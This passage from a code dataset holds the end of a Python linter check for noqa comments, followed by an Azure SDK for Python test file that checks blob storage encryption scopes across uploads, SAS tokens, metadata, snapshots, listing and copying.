continue
for excluded in excludes_list:
if re.fullmatch(r'{0}($|\d+)'.format(noqa_code), excluded):
self.add_violation(
ForbiddenInlineIgnoreViolation(text=str(noqa_excludes)),
)
return
def _post_visit(self) -> None:
if self._noqa_count > self.options.max_noqa_comments:
self.add_violation(
OveruseOfNoqaCommentViolation(text=str(self._noqa_count)),
)
|
sdk/storage/azure-storage-blob/tests/test_cpk_n.py | vincenttran-msft/azure-sdk-for-python | 2,728 | 12697490 | # coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import pytest
from datetime import datetime, timedelta
from azure.core.exceptions import HttpResponseError
from azure.storage.blob import (
BlobServiceClient,
BlobType,
BlobBlock,
BlobSasPermissions,
ContainerEncryptionScope,
generate_blob_sas,
generate_account_sas, ResourceTypes, AccountSasPermissions, generate_container_sas, ContainerSasPermissions
)
from settings.testcase import BlobPreparer
from devtools_testutils.storage import StorageTestCase
# ------------------------------------------------------------------------------
# The encryption scopes are pre-created using the management plane tool ArmClient,
# so we can use them directly in the tests.
TEST_ENCRYPTION_KEY_SCOPE = "antjoscope1"
TEST_CONTAINER_ENCRYPTION_KEY_SCOPE = ContainerEncryptionScope(
default_encryption_scope="containerscope")
TEST_CONTAINER_ENCRYPTION_KEY_SCOPE_DENY_OVERRIDE = {
"default_encryption_scope": "containerscope",
"prevent_encryption_scope_override": True
}
TEST_SAS_ENCRYPTION_SCOPE = "testscope1"
TEST_SAS_ENCRYPTION_SCOPE_2 = "testscope2"
# ------------------------------------------------------------------------------
class StorageCPKNTest(StorageTestCase):
def _setup(self, bsc):
self.config = bsc._config
self.container_name = self.get_resource_name('utcontainer')
# prep some test data so that they can be used in upload tests
self.byte_data = self.get_random_bytes(64 * 1024)
if self.is_live:
try:
bsc.create_container(self.container_name)
except:
pass
def _teardown(self, bsc):
if self.is_live:
try:
bsc.delete_container(self.container_name)
except:
pass
return super(StorageCPKNTest, self).tearDown()
# --Helpers-----------------------------------------------------------------
def _get_blob_reference(self):
return self.get_resource_name("cpk")
def _create_block_blob(self, bsc, blob_name=None, data=None, encryption_scope=None, max_concurrency=1, overwrite=False):
blob_name = blob_name if blob_name else self._get_blob_reference()
blob_client = bsc.get_blob_client(self.container_name, blob_name)
data = data if data else b''
resp = blob_client.upload_blob(data, encryption_scope=encryption_scope, max_concurrency=max_concurrency, overwrite=overwrite)
return blob_client, resp
def _create_append_blob(self, bsc, encryption_scope=None):
blob_name = self._get_blob_reference()
blob = bsc.get_blob_client(
self.container_name,
blob_name)
blob.create_append_blob(encryption_scope=encryption_scope)
return blob
def _create_page_blob(self, bsc, encryption_scope=None):
blob_name = self._get_blob_reference()
blob = bsc.get_blob_client(
self.container_name,
blob_name)
blob.create_page_blob(1024 * 1024, encryption_scope=encryption_scope)
return blob
# -- Test cases for APIs supporting CPK ----------------------------------------------
@pytest.mark.playback_test_only
@BlobPreparer()
def test_put_block_and_put_block_list(self, storage_account_name, storage_account_key):
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_client, _ = self._create_block_blob(bsc)
blob_client.stage_block('1', b'AAA', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
blob_client.stage_block('2', b'BBB', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
blob_client.stage_block('3', b'CCC', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
block_list = [BlobBlock(block_id='1'), BlobBlock(block_id='2'), BlobBlock(block_id='3')]
put_block_list_resp = blob_client.commit_block_list(block_list,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(put_block_list_resp['etag'])
self.assertIsNotNone(put_block_list_resp['last_modified'])
self.assertTrue(put_block_list_resp['request_server_encrypted'])
self.assertEqual(put_block_list_resp['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), b'AAABBBCCC')
self.assertEqual(blob.properties.etag, put_block_list_resp['etag'])
self.assertEqual(blob.properties.last_modified, put_block_list_resp['last_modified'])
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
self._teardown(bsc)
@pytest.mark.live_test_only
@BlobPreparer()
def test_put_block_and_put_block_list_with_blob_sas(self, storage_account_name, storage_account_key):
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_name = self._get_blob_reference()
token1 = generate_blob_sas(
storage_account_name,
self.container_name,
blob_name,
account_key=storage_account_key,
permission=BlobSasPermissions(read=True, write=True, delete=True),
expiry=datetime.utcnow() + timedelta(hours=1),
encryption_scope=TEST_SAS_ENCRYPTION_SCOPE,
)
blob_client = BlobServiceClient(self.account_url(storage_account_name, "blob"), token1)\
.get_blob_client(self.container_name, blob_name)
blob_client.stage_block('1', b'AAA')
blob_client.stage_block('2', b'BBB')
blob_client.stage_block('3', b'CCC')
# Act
block_list = [BlobBlock(block_id='1'), BlobBlock(block_id='2'), BlobBlock(block_id='3')]
put_block_list_resp = blob_client.commit_block_list(block_list)
# Assert
self.assertIsNotNone(put_block_list_resp['etag'])
self.assertIsNotNone(put_block_list_resp['last_modified'])
self.assertTrue(put_block_list_resp['request_server_encrypted'])
self.assertEqual(put_block_list_resp['encryption_scope'], TEST_SAS_ENCRYPTION_SCOPE)
# Act get the blob content
blob = blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), b'AAABBBCCC')
self.assertEqual(blob.properties.etag, put_block_list_resp['etag'])
self.assertEqual(blob.properties.last_modified, put_block_list_resp['last_modified'])
self.assertEqual(blob.properties.encryption_scope, TEST_SAS_ENCRYPTION_SCOPE)
self._teardown(bsc)
@pytest.mark.live_test_only
@BlobPreparer()
def test_put_block_and_put_block_list_with_blob_sas_fails(self, storage_account_name, storage_account_key):
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_name = self._get_blob_reference()
token1 = generate_blob_sas(
storage_account_name,
self.container_name,
blob_name,
account_key=storage_account_key,
permission=BlobSasPermissions(read=True, write=True, delete=True),
expiry=datetime.utcnow() + timedelta(hours=1),
encryption_scope=TEST_SAS_ENCRYPTION_SCOPE,
)
blob_client = BlobServiceClient(self.account_url(storage_account_name, "blob"), token1)\
.get_blob_client(self.container_name, blob_name)
# both ses in SAS and encryption_scopes are both set and have DIFFERENT values will throw exception
with self.assertRaises(HttpResponseError):
blob_client.stage_block('1', b'AAA', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# both ses in SAS and encryption_scopes are both set and have SAME values will succeed
blob_client.stage_block('1', b'AAA', encryption_scope=TEST_SAS_ENCRYPTION_SCOPE)
# Act
block_list = [BlobBlock(block_id='1')]
# both ses in SAS and encryption_scopes are both set and have DIFFERENT values will throw exception
with self.assertRaises(HttpResponseError):
blob_client.commit_block_list(block_list, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# both ses in SAS and encryption_scopes are both set and have SAME values will succeed
put_block_list_resp = blob_client.commit_block_list(block_list, encryption_scope=TEST_SAS_ENCRYPTION_SCOPE)
# Assert
self.assertIsNotNone(put_block_list_resp['etag'])
self.assertIsNotNone(put_block_list_resp['last_modified'])
self.assertTrue(put_block_list_resp['request_server_encrypted'])
self.assertEqual(put_block_list_resp['encryption_scope'], TEST_SAS_ENCRYPTION_SCOPE)
# generate a sas with a different encryption scope
token2 = generate_blob_sas(
storage_account_name,
self.container_name,
blob_name,
account_key=storage_account_key,
permission=BlobSasPermissions(read=True, write=True, delete=True),
expiry=datetime.utcnow() + timedelta(hours=1),
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE,
)
blob_client_diff_encryption_scope_sas = BlobServiceClient(self.account_url(storage_account_name, "blob"), token2)\
.get_blob_client(self.container_name, blob_name)
        # The blob can be downloaded successfully regardless of which encryption scope
        # it was written with: the scope on the blob is TEST_SAS_ENCRYPTION_SCOPE while
        # ses in the SAS token is TEST_ENCRYPTION_KEY_SCOPE, yet the download succeeds.
blob = blob_client_diff_encryption_scope_sas.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), b'AAA')
self.assertEqual(blob.properties.etag, put_block_list_resp['etag'])
self.assertEqual(blob.properties.last_modified, put_block_list_resp['last_modified'])
self.assertEqual(blob.properties.encryption_scope, TEST_SAS_ENCRYPTION_SCOPE)
self._teardown(bsc)
@pytest.mark.live_test_only
@pytest.mark.playback_test_only
@BlobPreparer()
def test_create_block_blob_with_chunks(self, storage_account_name, storage_account_key):
# parallel operation
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
# Arrange
# to force the in-memory chunks to be used
self.config.use_byte_buffer = True
# Act
# create_blob_from_bytes forces the in-memory chunks to be used
blob_client, upload_response = self._create_block_blob(bsc, data=self.byte_data, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE,
max_concurrency=2)
# Assert
self.assertIsNotNone(upload_response['etag'])
self.assertIsNotNone(upload_response['last_modified'])
self.assertTrue(upload_response['request_server_encrypted'])
self.assertEqual(upload_response['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), self.byte_data)
self.assertEqual(blob.properties.etag, upload_response['etag'])
self.assertEqual(blob.properties.last_modified, upload_response['last_modified'])
self._teardown(bsc)
@pytest.mark.live_test_only
@pytest.mark.playback_test_only
@BlobPreparer()
def test_create_block_blob_with_sub_streams(self, storage_account_name, storage_account_key):
# problem with the recording framework can only run live
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
# Act
# create_blob_from_bytes forces the in-memory chunks to be used
blob_client, upload_response = self._create_block_blob(bsc, data=self.byte_data, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE,
max_concurrency=2)
# Assert
self.assertIsNotNone(upload_response['etag'])
self.assertIsNotNone(upload_response['last_modified'])
self.assertTrue(upload_response['request_server_encrypted'])
self.assertEqual(upload_response['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), self.byte_data)
self.assertEqual(blob.properties.etag, upload_response['etag'])
self.assertEqual(blob.properties.last_modified, upload_response['last_modified'])
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_create_block_blob_with_single_chunk(self, storage_account_name, storage_account_key):
# Act
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
data = b'AAABBBCCC'
# create_blob_from_bytes forces the in-memory chunks to be used
blob_client, upload_response = self._create_block_blob(bsc, data=data, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(upload_response['etag'])
self.assertIsNotNone(upload_response['last_modified'])
self.assertTrue(upload_response['request_server_encrypted'])
# Act get the blob content
blob = blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), data)
self.assertEqual(blob.properties.etag, upload_response['etag'])
self.assertEqual(blob.properties.last_modified, upload_response['last_modified'])
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_put_block_from_url_and_commit_with_cpk(self, storage_account_name, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
# create source blob and get source blob url
source_blob_name = self.get_resource_name("sourceblob")
        self.config.use_byte_buffer = True  # Make sure chunked upload is used so the request can be recorded
source_blob_client, _ = self._create_block_blob(bsc, blob_name=source_blob_name, data=self.byte_data)
source_blob_sas = generate_blob_sas(
source_blob_client.account_name,
source_blob_client.container_name,
source_blob_client.blob_name,
snapshot=source_blob_client.snapshot,
account_key=source_blob_client.credential.account_key,
permission=BlobSasPermissions(read=True),
expiry=datetime.utcnow() + timedelta(hours=1)
)
source_blob_url = source_blob_client.url + "?" + source_blob_sas
# create destination blob
self.config.use_byte_buffer = False
destination_blob_client, _ = self._create_block_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act part 1: make put block from url calls
destination_blob_client.stage_block_from_url(block_id=1, source_url=source_blob_url,
source_offset=0, source_length=4 * 1024,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
destination_blob_client.stage_block_from_url(block_id=2, source_url=source_blob_url,
source_offset=4 * 1024, source_length=4 * 1024,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert blocks
committed, uncommitted = destination_blob_client.get_block_list('all')
self.assertEqual(len(uncommitted), 2)
self.assertEqual(len(committed), 0)
# commit the blocks without cpk should fail
block_list = [BlobBlock(block_id='1'), BlobBlock(block_id='2')]
with self.assertRaises(HttpResponseError):
destination_blob_client.commit_block_list(block_list)
# Act commit the blocks with cpk should succeed
put_block_list_resp = destination_blob_client.commit_block_list(block_list,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(put_block_list_resp['etag'])
self.assertIsNotNone(put_block_list_resp['last_modified'])
self.assertTrue(put_block_list_resp['request_server_encrypted'])
# Act get the blob content
blob = destination_blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), self.byte_data[0: 8 * 1024])
self.assertEqual(blob.properties.etag, put_block_list_resp['etag'])
self.assertEqual(blob.properties.last_modified, put_block_list_resp['last_modified'])
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_append_block(self, storage_account_name, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_client = self._create_append_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
for content in [b'AAA', b'BBB', b'CCC']:
append_blob_prop = blob_client.append_block(content, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(append_blob_prop['etag'])
self.assertIsNotNone(append_blob_prop['last_modified'])
self.assertTrue(append_blob_prop['request_server_encrypted'])
# Act get the blob content
blob = blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), b'AAABBBCCC')
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_append_block_from_url(self, storage_account_name, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
source_blob_name = self.get_resource_name("sourceblob")
self.config.use_byte_buffer = True # chunk upload
source_blob_client, _ = self._create_block_blob(bsc, blob_name=source_blob_name, data=self.byte_data)
source_blob_sas = generate_blob_sas(
source_blob_client.account_name,
source_blob_client.container_name,
source_blob_client.blob_name,
snapshot=source_blob_client.snapshot,
account_key=source_blob_client.credential.account_key,
permission=BlobSasPermissions(read=True),
expiry=datetime.utcnow() + timedelta(hours=1)
)
source_blob_url = source_blob_client.url + "?" + source_blob_sas
self.config.use_byte_buffer = False
destination_blob_client = self._create_append_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
append_blob_prop = destination_blob_client.append_block_from_url(source_blob_url,
source_offset=0,
source_length=4 * 1024,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(append_blob_prop['etag'])
self.assertIsNotNone(append_blob_prop['last_modified'])
self.assertTrue(append_blob_prop['request_server_encrypted'])
self.assertEqual(append_blob_prop['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = destination_blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), self.byte_data[0: 4 * 1024])
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_create_append_blob_with_chunks(self, storage_account_name, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_client = self._create_append_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
append_blob_prop = blob_client.upload_blob(self.byte_data,
blob_type=BlobType.AppendBlob, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(append_blob_prop['etag'])
self.assertIsNotNone(append_blob_prop['last_modified'])
self.assertTrue(append_blob_prop['request_server_encrypted'])
self.assertEqual(append_blob_prop['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), self.byte_data)
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_update_page(self, storage_account_name, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_client = self._create_page_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
page_blob_prop = blob_client.upload_page(self.byte_data,
offset=0,
length=len(self.byte_data),
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(page_blob_prop['etag'])
self.assertIsNotNone(page_blob_prop['last_modified'])
self.assertTrue(page_blob_prop['request_server_encrypted'])
self.assertEqual(page_blob_prop['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = blob_client.download_blob(offset=0,
length=len(self.byte_data))
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), self.byte_data)
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_update_page_from_url(self, storage_account_name, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
source_blob_name = self.get_resource_name("sourceblob")
        self.config.use_byte_buffer = True  # Make sure chunked upload is used so the request can be recorded
source_blob_client, _ = self._create_block_blob(bsc, blob_name=source_blob_name, data=self.byte_data)
source_blob_sas = generate_blob_sas(
source_blob_client.account_name,
source_blob_client.container_name,
source_blob_client.blob_name,
snapshot=source_blob_client.snapshot,
account_key=source_blob_client.credential.account_key,
permission=BlobSasPermissions(read=True),
expiry=datetime.utcnow() + timedelta(hours=1)
)
source_blob_url = source_blob_client.url + "?" + source_blob_sas
self.config.use_byte_buffer = False
blob_client = self._create_page_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
page_blob_prop = blob_client.upload_pages_from_url(source_blob_url,
offset=0,
length=len(self.byte_data),
source_offset=0,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(page_blob_prop['etag'])
self.assertIsNotNone(page_blob_prop['last_modified'])
self.assertTrue(page_blob_prop['request_server_encrypted'])
self.assertEqual(page_blob_prop['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = blob_client.download_blob(offset=0,
length=len(self.byte_data))
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), self.byte_data)
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
self._teardown(bsc)
@pytest.mark.live_test_only
@pytest.mark.playback_test_only
@BlobPreparer()
def test_create_page_blob_with_chunks(self, storage_account_name, storage_account_key):
# Act
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_client = bsc.get_blob_client(self.container_name, self._get_blob_reference())
page_blob_prop = blob_client.upload_blob(self.byte_data,
blob_type=BlobType.PageBlob,
max_concurrency=2,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(page_blob_prop['etag'])
self.assertIsNotNone(page_blob_prop['last_modified'])
self.assertTrue(page_blob_prop['request_server_encrypted'])
self.assertEqual(page_blob_prop['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), self.byte_data)
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_get_set_blob_metadata(self, storage_account_name, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_client, _ = self._create_block_blob(bsc, data=b'AAABBBCCC', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
blob_props = blob_client.get_blob_properties()
# Assert
self.assertTrue(blob_props.server_encrypted)
self.assertEqual(blob_props['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act set blob properties
metadata = {'hello': 'world', 'number': '42', 'up': 'upval'}
with self.assertRaises(HttpResponseError):
blob_client.set_blob_metadata(
metadata=metadata,
)
blob_client.set_blob_metadata(metadata=metadata, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
blob_props = blob_client.get_blob_properties()
md = blob_props.metadata
self.assertEqual(3, len(md))
self.assertEqual(md['hello'], 'world')
self.assertEqual(md['number'], '42')
self.assertEqual(md['up'], 'upval')
self.assertFalse('Up' in md)
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_snapshot_blob(self, storage_account_name, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_client, _ = self._create_block_blob(bsc, data=b'AAABBBCCC', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act without cpk should not work
with self.assertRaises(HttpResponseError):
blob_client.create_snapshot()
# Act with cpk should work
blob_snapshot = blob_client.create_snapshot(encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(blob_snapshot)
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_list_blobs(self, storage_account_name, storage_account_key):
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_client, _ = self._create_block_blob(bsc, blob_name="blockblob", data=b'AAABBBCCC', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
self._create_append_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
container_client = bsc.get_container_client(self.container_name)
generator = container_client.list_blobs(include="metadata")
for blob in generator:
self.assertIsNotNone(blob)
# Assert: every listed blob has encryption_scope
self.assertEqual(blob.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
self._teardown(bsc)
@pytest.mark.live_test_only
@BlobPreparer()
def test_list_blobs_using_container_encryption_scope_sas(self, storage_account_name, storage_account_key):
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
token = generate_container_sas(
storage_account_name,
self.container_name,
storage_account_key,
permission=ContainerSasPermissions(read=True, write=True, list=True, delete=True),
expiry=datetime.utcnow() + timedelta(hours=1),
encryption_scope=TEST_SAS_ENCRYPTION_SCOPE
)
bsc_with_sas_credential = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=token,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
# blob is encrypted using TEST_SAS_ENCRYPTION_SCOPE
blob_client, _ = self._create_block_blob(bsc_with_sas_credential, blob_name="blockblob", data=b'AAABBBCCC', overwrite=True)
self._create_append_blob(bsc_with_sas_credential)
# generate a token with TEST_ENCRYPTION_KEY_SCOPE
token2 = generate_container_sas(
storage_account_name,
self.container_name,
storage_account_key,
permission=ContainerSasPermissions(read=True, write=True, list=True, delete=True),
expiry=datetime.utcnow() + timedelta(hours=1),
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE
)
bsc_with_diff_sas_credential = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=token2,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
container_client = bsc_with_diff_sas_credential.get_container_client(self.container_name)
        # The ses field in the SAS token used to list blobs differs from the encryption
        # scope used when the blobs were created, but listing should still succeed
generator = container_client.list_blobs(include="metadata")
for blob in generator:
self.assertIsNotNone(blob)
# Assert: every listed blob has encryption_scope
# and the encryption scope is the same as the one on blob creation
self.assertEqual(blob.encryption_scope, TEST_SAS_ENCRYPTION_SCOPE)
self._teardown(bsc)
@pytest.mark.live_test_only
@BlobPreparer()
def test_copy_with_account_encryption_scope_sas(self, storage_account_name, storage_account_key):
# Arrange
sas_token = generate_account_sas(
storage_account_name,
account_key=storage_account_key,
resource_types=ResourceTypes(object=True, container=True),
permission=AccountSasPermissions(read=True, write=True, delete=True, list=True),
expiry=datetime.utcnow() + timedelta(hours=1),
encryption_scope=TEST_SAS_ENCRYPTION_SCOPE_2
)
bsc_with_sas_credential = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=sas_token,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc_with_sas_credential)
# blob is encrypted using TEST_SAS_ENCRYPTION_SCOPE_2
blob_client, _ = self._create_block_blob(bsc_with_sas_credential, blob_name="blockblob", data=b'AAABBBCCC', overwrite=True)
#
sas_token2 = generate_account_sas(
storage_account_name,
account_key=storage_account_key,
resource_types=ResourceTypes(object=True, container=True),
permission=AccountSasPermissions(read=True, write=True, delete=True, list=True),
expiry=datetime.utcnow() + timedelta(hours=1),
encryption_scope=TEST_SAS_ENCRYPTION_SCOPE
)
bsc_with_account_key_credential = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=sas_token2,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
copied_blob = self.get_resource_name('copiedblob')
copied_blob_client = bsc_with_account_key_credential.get_blob_client(self.container_name, copied_blob)
        # TODO: confirm with Sean/Heidi whether ses in SAS can be set for async copy;
        # the test failed for async copy (without requires_sync=True)
copied_blob_client.start_copy_from_url(blob_client.url, requires_sync=True)
props = copied_blob_client.get_blob_properties()
self.assertEqual(props.encryption_scope, TEST_SAS_ENCRYPTION_SCOPE)
